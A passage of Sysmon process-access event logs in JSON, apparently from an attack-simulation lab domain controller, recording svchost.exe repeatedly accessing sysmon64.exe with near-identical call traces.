C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 